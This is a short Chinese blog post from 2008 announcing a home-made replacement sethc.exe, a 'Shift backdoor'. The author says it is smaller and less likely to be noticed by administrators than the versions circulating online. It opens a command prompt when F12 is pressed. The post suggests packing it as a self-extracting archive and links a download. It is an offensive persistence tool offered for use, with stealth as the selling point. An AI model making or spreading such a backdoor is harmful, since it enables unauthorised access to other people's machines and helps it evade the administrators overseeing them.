首页 > 工具收集 > Shift后门安全版

Shift后门安全版

2008年10月21日 发表评论 阅读评论

  网上提供的sethc后门可大,而且运行时不安全,会让管理容易发现,于是,昨天晚上没事用VC写了个简单的sethc.exe程序。 可以将该文件制作成自解压RAR文件,释放到指定目录,这样比较好一点,可以体积会更小!

  文件大小:20k
  执行cmd方式:F12 键
  下载:[sfile]http://woyigui.qupan.com/203455.html[/sfile]

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Shift后门安全版
本文地址:http://www.woyigui.cn/2008/10/21/shift-back-door-version-of-the-security_8915/

分类: 工具收集 标签:
  1. 2008年10月21日12:56 | #1

    转走…

    [回复]

  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*